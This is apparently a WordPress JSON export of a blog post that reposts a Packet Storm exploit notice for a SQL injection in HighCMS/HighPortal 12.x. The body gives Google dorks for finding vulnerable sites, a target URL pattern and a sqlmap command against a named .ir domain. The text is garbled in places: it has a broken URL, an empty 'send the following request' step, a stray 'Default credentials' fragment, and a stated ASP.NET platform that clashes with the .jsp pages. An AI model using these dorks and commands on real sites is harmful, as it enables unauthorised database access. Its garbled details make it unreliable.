{"id":24545,"date":"2022-05-16T19:48:13","date_gmt":"2022-05-16T15:48:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167170\/highcmshighportal12x-sql.txt"},"modified":"2022-05-28T11:36:14","modified_gmt":"2022-05-28T07:06:14","slug":"highcms-highportal-12-x-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/highcms-highportal-12-x-sql-injection\/","title":{"rendered":"HighCMS\/HighPortal 12.x SQL Injection"},"content":{"rendered":"
\n
HighCMS\/HighPortal 12.x SQL Injection<\/strong><\/a><\/dt>\n
Posted May 16, 2022<\/a><\/dd>\n
Authored by E1.Coders<\/a><\/dd>\n
HighCMS\/HighPortal version 12.x appears to suffer from a remote SQL injection vulnerability.<\/dd>\n
tags | exploit<\/a>, remote<\/a>, sql injection<\/a><\/dd>\n
SHA-256 | 11e531f865e4da1f04161aa0a4cb5e11bbe807e029d3818481e6c9fa1d18a1e6<\/code><\/dd>\n
Download<\/a> | Favorite<\/a> | View<\/a><\/dd>\n<\/dl>\n
\n
# Exploit Title: HighCMS\/HighPortal v12.x SQL Inj\r\n# Type : WEBAPPS \"HighCMS\/HighPortal\"\r\n# Platform : ASP.NET\r\n# Date : 4\/23\/2022\r\n# Exploit Author : E1.Coders\r\n# Software Link : https:\/\/aryanic.com\/page\/portal\r\n# Version : v12.x\r\n# Category : Webapps\r\n# Tested on: Linux\/Windows\r\n# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid=<\/code><\/pre>\n
# Google Dork: <\u00a92022 HighCMS\/HighPortal”<\/p>\n
<\/code><\/pre>\n
Step 1: Enter the address of the “page” that has the problem of sql injection attacks
\nhttp: \/\/TARGET\/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials. ( is True )
\nSTEP 2 : Send the following request ”
\nor
\nUse sqlmap : python sqlmap.py -u “https:\/\/example.ir\/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211”<\/p>\n
<\/code><\/pre>\n
 <\/p>\n
<\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
HighCMS\/HighPortal 12.x SQL Injection Posted May 16, 2022 Authored by E1.Coders HighCMS\/HighPortal version 12.x appears to suffer from a remote SQL injection vulnerability. tags | exploit, remote, sql injection SHA-256 | 11e531f865e4da1f04161aa0a4cb5e11bbe807e029d3818481e6c9fa1d18a1e6 Download | Favorite | View # Exploit Title: HighCMS\/HighPortal v12.x SQL Inj # Type : WEBAPPS “HighCMS\/HighPortal” # Platform : ASP.NET # Date …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24545","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24545"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24545\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24545"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24545"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}